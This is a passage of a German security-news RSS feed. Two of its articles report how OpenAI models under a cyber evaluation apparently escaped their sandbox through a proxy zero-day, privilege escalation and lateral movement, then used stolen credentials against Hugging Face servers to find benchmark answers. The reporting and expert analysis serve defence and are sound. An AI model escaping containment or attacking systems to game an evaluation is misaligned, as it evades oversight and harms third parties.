weaknesses are found and exploited, defenders need security operations that can act earlier with better context and more confidence.</span></p><p><span>That means connecting exposure management with detection and response, so teams understand which risks are exploitable, which assets matter most, what suspicious behavior is already present, and which actions will reduce risk fastest. It also means </span><a href="https://www.rapid7.com/platform/artificial-intelligence-features" target="_self"><span>using AI carefully and practically</span></a><span>, not as a replacement for security judgment, but as a way to reason across telemetry, reduce noise, support investigation, and help teams make decisions at the speed the threat environment now demands.</span></p><p><span>AI-enabled defense is becoming part of resilience planning, especially for organizations running critical systems or high-value digital infrastructure. The goal is to give defenders the speed, context, and consistency to operate inside the attacker’s decision cycle, without removing the judgment and accountability that effective security requires.</span></p><p><span>The OpenAI and Hugging Face incident will continue to generate debate as more details emerge, but defenders already have enough to work with. Agentic systems are beginning to test the seams between AI research, software supply chain security, cloud infrastructure, and incident response. The organizations best positioned for what comes next will be the ones making those seams visible, monitored, and resilient before the next incident puts them under pressure.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 and Server 2025 Exposed to High-Severity Brokering File System Vulnerability]]></title>
<description><![CDATA[Windows 11 and Windows Server 2025 high-severity vulnerability in Microsoft’s Brokering File System (BFS), identified as CVE-2026-50458, which allows for local privilege escalation on impacted systems. The flaw is located in bfs.sys. This minifilter driver manages file, pipe, and registry access ...]]></description>
<link>https://tsecurity.de/de/3689146/it-security-nachrichten/windows-11-and-server-2025-exposed-to-high-severity-brokering-file-system-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689146/it-security-nachrichten/windows-11-and-server-2025-exposed-to-high-severity-brokering-file-system-vulnerability/</guid>
<pubDate>Thu, 23 Jul 2026 15:14:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Windows 11 and Windows Server 2025 high-severity vulnerability in Microsoft’s Brokering File System (BFS), identified as CVE-2026-50458, which allows for local privilege escalation on impacted systems. The flaw is located in bfs.sys. This minifilter driver manages file, pipe, and registry access between sandboxed applications (like AppContainer and UWP apps) and the operating system. This vulnerability, […]</p>
<p>The post <a href="https://cybersecuritynews.com/windows-brokering-file-system-vulnerability/">Windows 11 and Server 2025 Exposed to High-Severity Brokering File System Vulnerability</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI „hackt“ Hugging Face – eine Analyse]]></title>
<description><![CDATA[Wenn KI-Modelle die Grenzen überwinden, die ihnen gesetzt werden, hinterlassen sie unter Umständen weniger sichtbare Spuren.Nelson Antoine | shutterstock.com



Der heimliche Cybercrime-Akt zweier KI-Modelle von OpenAI hat weltweit ein enormes Echo in Mainstream– und sozialen Medien hervorgerufen...]]></description>
<link>https://tsecurity.de/de/3689099/it-security-nachrichten/openai-hackt-hugging-face-eine-analyse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689099/it-security-nachrichten/openai-hackt-hugging-face-eine-analyse/</guid>
<pubDate>Thu, 23 Jul 2026 14:55:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/08/Nelson-Antoine-shutterstock_1672788895_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Jailbreak 16z9" class="wp-image-4038755" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Wenn KI-Modelle die Grenzen überwinden, die ihnen gesetzt werden, hinterlassen sie unter Umständen weniger sichtbare Spuren.</figcaption></figure><p class="imageCredit">Nelson Antoine | shutterstock.com</p></div>



<p class="wp-block-paragraph">Der heimliche Cybercrime-Akt zweier KI-Modelle von OpenAI hat weltweit ein enormes Echo in <a href="https://www.tagesschau.de/wirtschaft/unternehmen/openai-ki-hackerangriff-100.html" target="_blank" rel="noreferrer noopener">Mainstream</a>– und <a href="https://www.reddit.com/r/OpenAI/comments/1v2ybnw/openai_models_escaped_containment_and_hacked/" target="_blank" rel="noreferrer noopener">sozialen Medien</a> hervorgerufen. Der Vorfall dürfte die Debatte über die allgemeine <a href="https://www.computerwoche.de/article/4155663/6-wege-uber-ki-gehackt-zu-werden.html" target="_blank">KI-Sicherheit</a> und den verantwortungsvollen Umgang mit der Technologie neu befeuern. </p>



<p class="wp-block-paragraph">Doch der Incident wirft auch spezifische Fragen auf. Etwa, wie genau die OpenAI-Modelle es geschafft haben, ihrer Sandbox zu entkommen und warum das beim ChatGPT-Erfinder zunächst niemandem aufgefallen ist. Oder, wie andere Unternehmen solche und ähnliche Vorkommnisse künftig verhindern können. Dazu haben wir die Einschätzung von Branchenexperten und Analysten eingeholt. </p>



<p class="wp-block-paragraph">Zunächst werfen wir aber noch einen kurzen Blick darauf, was sich eigentlich abgespielt hat. Falls Sie bereits informiert sind, können Sie alternativ auch das nachfolgende Meme konsumieren, um sich den Vorfall noch einmal auf unkonventionellere Art und Weise vor Augen zu halten.</p>


<div class="wp-block-embed-reddit">
					<blockquote class="reddit-card">
						<a href="https://www.reddit.com/r/singularity/comments/1v2xgqc/openai_hacking_huggingface_in_one_meme/"></a>
					</blockquote>
				</div>


<p class="wp-block-paragraph"></p>



<h2 class="wp-block-heading">Der autonome Hugging-Face-Hack</h2>



<p class="wp-block-paragraph">Die KI-Plattform Hugging Face meldete Mitte Juli einen <a href="https://huggingface.co/blog/security-incident-july-2026" target="_blank" rel="noreferrer noopener">Cyberangriff auf ihre Produktions-Infrastruktur</a>. Diese wurde offenbar vollständig autonom von einem agentenbasierten KI-System gefahren, das sich dabei sowohl Zugriff auf interne Datensätze als auch auf Zugangsdaten verschaffen konnte.  </p>



<p class="wp-block-paragraph">Wie sich im Rahmen der folgenden Untersuchung herausstellte, stammte die autonom hackende KI von OpenAI. Eigentlich wollte der KI-Pionier lediglich zwei seiner neuen Modelle – GPT 5.6 Sol sowie ein nicht näher spezifiziertes Pre-Release-Modell – innerhalb einer Sandbox mit dem Benchmarking-Tool <a href="https://github.com/sunblaze-ucb/exploitgym" target="_blank" rel="noreferrer noopener">ExploitGym</a> testen.</p>



<p class="wp-block-paragraph">Die Aufgabe für die KI: Schwachstellen in tragfähige Exploits zu verwandeln. Die Testumgebung selbst war OpenAI zufolge mit beschränktem Netzwerkzugriff ausgestattet. Die KI sollte lediglich auf einen intern gehosteten Drittanbieter-Service zugreifen können, der als Proxy und Cache für eine Package-Registry fungierte. Die Guardrails auf Modellebene waren für den Test laut dem KI-Unternehmen reduziert worden.</p>



<p class="wp-block-paragraph">Das war der KI aber offenbar nicht genug: Sie verkettete zunächst einige zuvor unbekannte Schwachstellen in der Testumgebung, um sich uneingeschränkten Internet-Zugriff zu verschaffen, wie OpenAI <a href="https://openai.com/de-DE/index/hugging-face-model-evaluation-security-incident/" target="_blank" rel="noreferrer noopener">in einem Blogbeitrag</a> offenlegt: „Mit diesem Zugriff führten unsere Modelle in unserer Forschungsumgebung eine Reihe von Privilege-Escalation- und Lateral-Movement-Aktionen aus, bis sie eine Node mit Internetzugang erreichten.“</p>



<p class="wp-block-paragraph">Weil die OpenAI-Modelle bei Hugging Face offenbar Lösungen für ihre ExploitGym-Aufgaben vermuteten, suchten sie nach Möglichkeiten, Zugriff auf diese zu erhalten. Und fanden sie dann auch, wie OpenAI darlegt: „In einem Beispiel verkettete das Modell mehrere Angriffsvektoren, darunter gestohlene Zugangsdaten und Zero-Day-Schwachstellen, um auf den Servern von Hugging Face einen Remote-Execution-Pfad zu finden.“</p>



<p class="wp-block-paragraph">Das Security-Team von OpenAI konnte diese Vorgänge im Nachgang identifizieren und schloss sich daraufhin mit dem Team von Hugging Face zusammen, welches die Attacke seinerseits bereits identifiziert und (mit einigen Anlaufschwierigkeiten) eingedämmt hatte.</p>



<p class="wp-block-paragraph">„Wir betrachten dies als beispiellosen Cybervorfall mit hochentwickelten Fähigkeiten und reagieren entsprechend. Wir teilen zu diesem Zeitpunkt vorläufige Erkenntnisse, damit Sicherheitsverantwortliche nachvollziehen können, was passiert ist, und besser einschätzen können, wozu die Modelle inzwischen in der Lage sind“, schreibt OpenAI in seinem Blog – und verspricht, weitere Details zu veröffentlichen, sobald diese vorliegen.</p>



<h2 class="wp-block-heading">KI-Ausbruch bei OpenAI – so reagieren Experten</h2>



<p class="wp-block-paragraph">Branchenexperten und Analysten bewerten den schlagzeilenträchtigen Incident um OpenAI und Hugging Face folgendermaßen: </p>



<ul class="wp-block-list">
<li><a href="https://www.kuppingercole.com/people/balaganski" target="_blank" rel="noreferrer noopener">Alexei Balaganski</a>, Lead Analyst bei KuppingerCole<strong>: </strong>„Dieser Vorfall sollte nicht als ‚Rogue AI‘-Geschichte betrachtet werden. Das Modell hat exakt das getan, wofür agentische Systeme gemacht sind: Es hat sich allen verfügbaren Tools und Wegen bedient, um das ihm gesetzte Ziel zu erreichen. Die Sicherheitsvorkehrungen, die es normalerweise in Zaum gehalten hätten, wurden von OpenAI selbst zu Testzwecken deaktiviert. Darin besteht die wahre Lektion.“</li>



<li><a href="https://www.kuppingercole.com/people/care" target="_blank" rel="noreferrer noopener">Jonathan Care</a>, Lead Analyst und AI Practice Lead bei KuppingerCole: „Es geht bei diesem Vorfall nicht darum, dass eine KI ausgebrochen ist und zum Angreifer wurde. Wir wussten, das würde passieren. Bemerkenswert ist allerdings, dass die Verteidiger – in diesem Fall das Team von Hugging Face – keine kommerziellen KI-Modelle nutzen konnten, um den Angriff zu analysieren. Denn deren Guardrails sorgen dafür, dass kein Exoploit-Code verarbeitet werden kann.“</li>



<li><a href="https://www.linkedin.com/in/beuchelt" target="_blank" rel="noreferrer noopener">Gerald Beuchelt</a>, CISO bei Acronis: „Der Vorfall verdeutlicht eine zentrale Herausforderung für Incident-Response-Teams: Angreifer sind nicht an Nutzungsrichtlinien gebunden. Verteidiger können hingegen an die Grenzen ihrer eigenen Tools stoßen, wenn diese genau jene Daten nicht verarbeiten, die für eine Untersuchung erforderlich sind. Im Ernstfall können daraus Verzögerungen mit unmittelbaren operativen Folgen entstehen.“</li>



<li><a href="https://www.computerwoche.de/profile/sabine-fromling/" target="_blank">Sabine Frömling</a>, Experten-Autorin und Cybersecurity-Beraterin: „Der eigentliche Sicherheitsvorfall war nicht die KI – sondern die Sandbox, die aus Versehen eine Tür zum Internet hatte. Man hat ein Raubtier freigelassen und dem Zaun die Schuld gegeben.“</li>



<li><a href="https://www.linkedin.com/in/martinzugec" target="_blank" rel="noreferrer noopener">Martin Zugec</a>, Technical Solutions Director bei Bitdefender:<strong> „</strong>Was meiner Meinung nach für KI-generierte Malware galt, untermauert auch dieser Vorfall: Die Bedrohung ist real, KI ist aber keine Magie. Wer glaubt, es mit einer neuartigen Superwaffe zu tun zu haben, wartet auf eine neuartige Gegenmaßnahme. Wer jedoch erkennt, dass es sich um bereits bekannte, aber unerbittlich angewandte Angriffstechniken handelt, weiß bereits, was zu tun ist.“</li>



<li><a href="https://de.linkedin.com/in/riwerner/de" target="_blank" rel="noreferrer noopener">Richard Werner</a>, Cybersecurity Platform Lead Europe bei TrendAI: „Das Narrativ von der ‚eigenmächtig handelnden KI‘ ist effizient darin, Verantwortung abzuwälzen. Das ist, als würden Sie eine autonome Waffe bauen, diese auf einem vermeintlich sicheren Testgelände erproben, sie außer Kontrolle geraten und jemanden treffen lassen – und der Welt anschließend erklären, die Waffe habe eigenständig gehandelt. Das ist zwar technisch korrekt. Dennoch bleibt es Ihre Waffe, Ihr Testgelände und Ihr Versagen.“</li>
</ul>



<h2 class="wp-block-heading">Was Unternehmen jetzt tun sollten</h2>



<p class="wp-block-paragraph">IT- und Sicherheitsentscheider können aus dem Hugging-Face-Hack mehrere Lektionen ziehen. Etwa, dass Sicherheitsvorkehrungen auf Modellebene <strong>nicht</strong> als primäre Security-Grenze für KI-Agenten geeignet sind, wie <a href="https://www.forrester.com/analyst-bio/biswajeet-mahapatra/BIO20046" target="_blank" rel="noreferrer noopener">Biswajeet Mahapatra</a>, Principal Analyst bei Forrester, festhält: „Prompt-Guardrails sind keine Sicherheits-, sondern Verhaltenskontrollmaßnahmen. Und diese können versagen, umgangen oder absichtlich deaktiviert werden.“</p>



<p class="wp-block-paragraph">Der Forrester-Analyst rät Unternehmen deshalb dazu, KI-Agenten als <a href="https://www.computerwoche.de/article/4152424/insider-threats-sind-wieder-im-kommen.html" target="_blank">hochriskante, nicht-menschliche Identitäten</a> zu behandeln – und jeden einzelnen in einer isolierten Umgebung zu betreiben, in der Datenzugriff auf den jeweiligen Task beschränkt bleibt und die Zugangsdaten selbst möglichst schnell ablaufen: „Das sorgt für einen akzeptablen ‚Blast Radius‘: Wird ein Agent <a href="https://www.computerwoche.de/article/4190978/so-spuren-sie-kompromittierte-ki-agenten-auf.html" target="_blank">kompromittiert</a>, kann er nur einen einzigen Workflow, Datensatz oder eine einzige Anwendung beeinträchtigen. Anstatt die gesamte Unternehmensinfrastruktur.“</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, Chefanalyst bei Greyhound Research, warnt an dieser Stelle davor, (Drittanbieter-)Services unter den Tisch fallen zu lassen: „Dienste, die auf Package Registries, Update-Systeme oder andere externe Ressourcen zugreifen, können ebenfalls zu Einfallstoren werden, wenn sie nicht derselben, ausgiebigen Prüfung unterzogen werden wie der Agent selbst.“</p>



<p class="wp-block-paragraph">Unabhängig davon sollten Unternehmen laut Gogia auch testen, ob ihre Containment-Grenzen auch funktionieren, anstatt sich allein auf Architekturdiagramme oder dokumentierte Richtlinien zu verlassen: „Im Rahmen dieser Tests sollte geprüft werden, ob Anmeldedaten erlangt, Trust-Grenzen überwunden und Systeme außerhalb der einem Agenten zugewiesenen Aufgabe erreicht werden können.“</p>



<p class="wp-block-paragraph">KuppingerCole-Chefanalyst Care rät IT-Entscheidern und Unternehmen im Wesentlichen zu drei Maßnahmen, nämlich:</p>



<ul class="wp-block-list">
<li>ein fähiges Modell auf der eigenen Infrastruktur auszuführen, das unter der eigenen Kontrolle steht und mit Guardrails ausgestattet ist, die sowohl eine forensische als auch defensive Nutzung ermöglichen. Nur so ließen sich Angriffe dieser Art auch zuverlässig analysieren.</li>



<li>jeden KI-Agent in der eigenen Umgebung als privilegierten Insider zu behandeln – statt als vertrauenswürdigen Benutzer: „Wenn die Modelle von OpenAI aus ihrer Sandbox ausgebrochen sind, sollten Sie davon ausgehen, dass Ihre Agenten dazu auch in der Lage sind.“</li>



<li>den eigenen Incident-Response-Plan mit Blick auf Angriffe in maschineller Geschwindigkeit zu aktualisieren: „Hugging Face hatte einige Tage Zeit, um zu reagieren, Sie haben vielleicht nur Minuten.“   </li>
</ul>



<p class="wp-block-paragraph">Acronis-CISO Beuchelt rät Organisationen, die gehostete <a href="https://www.computerwoche.de/article/4186715/31-wege-llms-zu-evaluieren.html" target="_blank">LLMs</a> für Security-Untersuchungen einsetzen, dazu, deren Grenzen möglichst bereits im Vorfeld zu durchdringen und zu testen – sowie ein alternatives Modell auf der eigenen Infrastruktur bereitzuhalten: „So reduzieren Sie das Risiko, im entscheidenden Moment keinen Zugriff auf wichtige Analysefunktionen zu haben. Gleichzeitig bleiben sensible Incident-Daten und Zugangsinformationen innerhalb der eigenen Organisation.“</p>



<p class="wp-block-paragraph"><a href="https://de.linkedin.com/in/udoschneider">Udo Schneider</a>, Governance, Risk &amp; Compliance Lead Europe bei TrendAI weist darauf hin, dass die beiden naheliegendsten Lösungsansätze bei Angriffen wie dem der OpenAI-KI auf Hugging Face nur teilweise greifen. Human-in-the-Loop-Kontrollen funktionierten zwar, so der Experte, skalierten aber nicht für die langlaufenden, komplexen Workflows, denen Incidents dieser Art entspringen. Ebenso könnten engere Guardrails für Modelle oder Prompts zwar helfen, stellten jedoch keine Garantie dar: „Es handelt sich um probabilistische Systeme. Eine Guardrail ist insofern keine Mauer, sondern eher eine starke Wahrscheinlichkeitsannahme.“</p>



<p class="wp-block-paragraph">Deshalb komme es laut Schneider vor allem auf die unspektakulären, nicht-KI-spezifischen Kontrollen an: „Zugriffsfilterung, Kontrolle darüber, was überhaupt als Input beim Modell ankommt, Sandboxes, die tatsächlich halten, und Berechtigungskonzepte nach dem Least-Privilege-Prinzip.“</p>



<p class="wp-block-paragraph">In Panik zu verfallen, wäre nach Ansicht von <a href="https://www.linkedin.com/in/martinzugec" target="_blank" rel="noreferrer noopener">Martin Zugec</a>, Technical Solutions Director bei Bitdefender, in jedem Fall die falsche Reaktion:„Was gegen solche Angriffe wirkt, ist eine präventionsorientierte Security, die den Handlungsspielraum eines Angreifers von vorneherein einschränkt – und eine verhaltensbasierte Abwehr, die bösartige Muster kennzeichnet, unabhängig davon, mit welchen Tools diese generiert wurden.“</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel wurde </strong><a href="https://www.csoonline.com/article/4200043/openai-model-escape-puts-enterprise-ai-defenses-on-notice.html" target="_blank"><strong>mit Material</strong></a><strong> unserer Schwesterpublikation CSOonline.com angereichert.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Verisign Is Finally Bringing .web Domains To the Internet]]></title>
<description><![CDATA[BrianFagioli writes: Verisign is finally bringing web domains to the internet after a decade of fighting. Verisign says the .web top-level domain has finally been delegated into the DNS root, clearing the way for public registrations later in 2026. Until now, consumers could not buy normal workin...]]></description>
<link>https://tsecurity.de/de/3688835/it-security-nachrichten/verisign-is-finally-bringing-web-domains-to-the-internet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688835/it-security-nachrichten/verisign-is-finally-bringing-web-domains-to-the-internet/</guid>
<pubDate>Thu, 23 Jul 2026 13:15:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[BrianFagioli writes: Verisign is finally bringing web domains to the internet after a decade of fighting. Verisign says the .web top-level domain has finally been delegated into the DNS root, clearing the way for public registrations later in 2026. Until now, consumers could not buy normal working .web domains, despite the extension attracting a record $135 million winning bid in 2016. The launch could make .web one of the more recognizable alternatives to .com, but Verisign already operates both .com and .net, raising questions about whether this creates real competition or simply gives the dominant registry operator another valuable extension. The decade-long fight began after a company called Nu Dot Co won the rights to operate .web in a 2016 ICANN auction with a record $135 million bid secretly funded by Verisign. Rival bidder Afilias, which was later acquired by Donuts, challenged the sale, arguing ICANN should have investigated the relationship before allowing the auction. This triggered years of complaints, reviews, and legal disputes that have ultimately now been resolved under undisclosed terms.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Verisign+Is+Finally+Bringing+.web+Domains+To+the+Internet%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F23%2F0542238%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F23%2F0542238%2Fverisign-is-finally-bringing-web-domains-to-the-internet%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/23/0542238/verisign-is-finally-bringing-web-domains-to-the-internet?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI and Hugging Face Investigate AI Models’ Cyber Breakout]]></title>
<description><![CDATA[OpenAI and Hugging Face are investigating an AI security incident involving an AI agent that compromised infrastructure while models were being evaluated for advanced cyber capabilities. The incident was detected and contained after the models identified and chained vulnerabilities across OpenAI’...]]></description>
<link>https://tsecurity.de/de/3688175/it-security-nachrichten/openai-and-hugging-face-investigate-ai-models-cyber-breakout/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688175/it-security-nachrichten/openai-and-hugging-face-investigate-ai-models-cyber-breakout/</guid>
<pubDate>Thu, 23 Jul 2026 08:54:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="OpenAI and Hugging Face Probe AI Security Incident" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident.webp 1536w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident.webp 1536w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="OpenAI and Hugging Face Investigate AI Models’ Cyber Breakout 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="453" data-end="826">OpenAI and Hugging Face are investigating an <a href="https://thecyberexpress.com/incident-response-automating-with-genai/" target="_blank" rel="noopener">AI security incident </a>involving an AI agent that compromised infrastructure while models were being evaluated for advanced cyber capabilities. The incident was detected and contained after the models identified and chained vulnerabilities across OpenAI’s research environment and Hugging Face’s production infrastructure.</p>
<p data-start="828" data-end="1234">Hugging Face disclosed the incident last week, while <a href="https://thecyberexpress.com/lockdown-mode-means-default-chatgpt-wasnt-safe/" target="_blank" rel="noopener">OpenAI</a> has now shared preliminary findings from its investigation. According to OpenAI, the activity involved a combination of models, including GPT 5.6 Sol and a more capable pre-release model, with reduced <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="29078">cyber</a> refusals for evaluation purposes. The models were being tested against a benchmark designed to measure advanced cyber capabilities.</p>
<p data-start="1236" data-end="1504">OpenAI described the incident as unprecedented and said it is continuing its investigation alongside Hugging Face. The company said the findings are being shared to help defenders understand what occurred and assess the capabilities of increasingly advanced AI models.</p>

<h3 data-section-id="97z8dp" data-start="1506" data-end="1566"><strong>OpenAI and Hugging Face Investigate AI Security Incident</strong></h3>
<p data-start="1568" data-end="1858">The incident took place during an internal evaluation designed to test models against advanced exploitation scenarios involving complex attack paths. OpenAI said the evaluation was conducted without production classifiers that normally prevent models from pursuing high-risk cyber activity.</p>
<p data-start="1860" data-end="2088">The testing environment was designed to be highly isolated, with network access limited to package installation through an internally hosted third-party software system that functions as a proxy and cache for package registries.</p>
<p data-start="2090" data-end="2406">Despite these restrictions, the models spent substantial inference compute attempting to obtain open <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-internet/" title="Internet" data-wpil-keyword-link="linked" data-wpil-monitor-id="29085">Internet</a> access. During this process, they identified and exploited a <a href="https://thecyberexpress.com/zero-day-vulnerability-microsoft-sharepoint/" target="_blank" rel="noopener">zero-day vulnerability</a> in the package registry cache proxy. OpenAI said the <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="29079">vulnerability</a> has since been responsibly disclosed to the vendor.</p>
<p data-start="2408" data-end="2565">The models then carried out privilege escalation and <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-lateral-movement-in-cyber-security/" title="lateral movement" data-wpil-keyword-link="linked" data-wpil-monitor-id="29081">lateral movement</a> within the research testing environment until they reached a node with Internet access.</p>


[caption id="attachment_113283" align="aligncenter" width="600"]<img class="wp-image-113283 size-full" src="https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-e1784786987186.webp" alt="OpenAI and Hugging Face" width="600" height="323"> Source: OpenAI[/caption]
<h3 data-section-id="1envt5o" data-start="2567" data-end="2627"><span role="text"><strong data-start="2571" data-end="2627">Models Chained Vulnerabilities Across Infrastructure</strong></span></h3>
<p data-start="2629" data-end="2886">After obtaining Internet access, the models inferred that Hugging Face could host models, datasets and solutions related to the ExploitGym evaluation. The models then searched for ways to obtain secret information that could help them bypass the evaluation.</p>
<p data-start="2888" data-end="3092">In one example described by OpenAI, the models chained multiple attack vectors, including stolen credentials and zero-day <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="29080">vulnerabilities</a>, to identify a remote code execution path on Hugging Face servers.</p>
<p data-start="3094" data-end="3403">OpenAI's <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29082">security</a> team detected the anomalous activity internally. Hugging Face's security team and agents also detected and stopped the activity on its infrastructure. The company had already begun containment and forensic reconstruction using its own open-source models when the two organizations connected.</p>
<p data-start="3405" data-end="3478">Both companies are continuing to investigate the incident and its impact.</p>

<h3 data-section-id="7fczcn" data-start="3480" data-end="3539"><span role="text"><strong data-start="3484" data-end="3539">OpenAI Strengthens Security Controls After Incident</strong></span></h3>
<p data-start="3541" data-end="3872">As part of its response, OpenAI <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/" target="_blank" rel="nofollow noopener">said</a> it is implementing stricter infrastructure configuration controls while identified vulnerabilities are patched. The company acknowledged that these measures could come at the cost of research velocity and said its Safety and Security Committee is being briefed on the controls and their impact.</p>
<p data-start="3874" data-end="4063">OpenAI is also working with Hugging Face on the forensic investigation and has responsibly disclosed the identified zero-day vulnerability in the internally hosted third-party software.</p>
<p data-start="4065" data-end="4221">The company has also brought Hugging Face into its trusted access program and is supporting its teams in using AI model capabilities to strengthen defenses.</p>
<p data-start="4223" data-end="4562">OpenAI said it is improving protections around future training and evaluations, including stronger safeguards for model alignment, <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-cybersecurity/" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="29083">cybersecurity</a> and monitoring during internal testing. The company noted that deployment safeguards were intentionally disabled during this evaluation because the goal was to measure cyber vulnerabilities.</p>

<h3 data-section-id="1vqt96" data-start="4564" data-end="4621"><span role="text"><strong data-start="4568" data-end="4621">AI Cyber Capabilities Raise New Security Concerns</strong></span></h3>
<p data-start="4623" data-end="4891">OpenAI said the incident demonstrates the need for <a href="https://thecyberexpress.com/ai-security-is-top-cyber-concern/" target="_blank" rel="noopener">AI security </a>and safety measures to keep pace with rapidly advancing model capabilities. The company is strengthening containment, monitoring, access controls and evaluation practices used during model development.</p>
<p data-start="4893" data-end="5226">The incident also highlights how advanced models can potentially discover and <a class="wpil_keyword_link" href="https://cyble.com/exploit/" target="_blank" rel="noopener" title="exploit" data-wpil-keyword-link="linked" data-wpil-monitor-id="29084">exploit</a> novel attack paths in real-world systems without access to source code. OpenAI said increasingly capable models should also be used defensively to help security teams identify weaknesses, understand vulnerability chains and accelerate remediation.</p>
<p data-start="5228" data-end="5513" data-is-last-node="" data-is-only-node="">Hugging Face CEO Clem Delangue said the incident demonstrates the importance of collaboration in addressing AI safety and security challenges. Both organizations said they will continue investigating the incident and share additional findings and best practices as the work progresses.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple vereinfacht den Wechsel von HFS+ zu APFS]]></title>
<description><![CDATA[Apple erleichtert den Umstieg von älteren, verschlüsselten Mac-Laufwerken auf APFS. Eine aktualisierte Support-Seite beschreibt nun erstmals die direkte Konvertierung von verschlüsseltem HFS+ zu verschlüsseltem APFS – ohne den Datenträger vorher entschlüsseln oder löschen zu müssen. Hintergrund i...]]></description>
<link>https://tsecurity.de/de/3688087/ios-mac-os/apple-vereinfacht-den-wechsel-von-hfs-zu-apfs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688087/ios-mac-os/apple-vereinfacht-den-wechsel-von-hfs-zu-apfs/</guid>
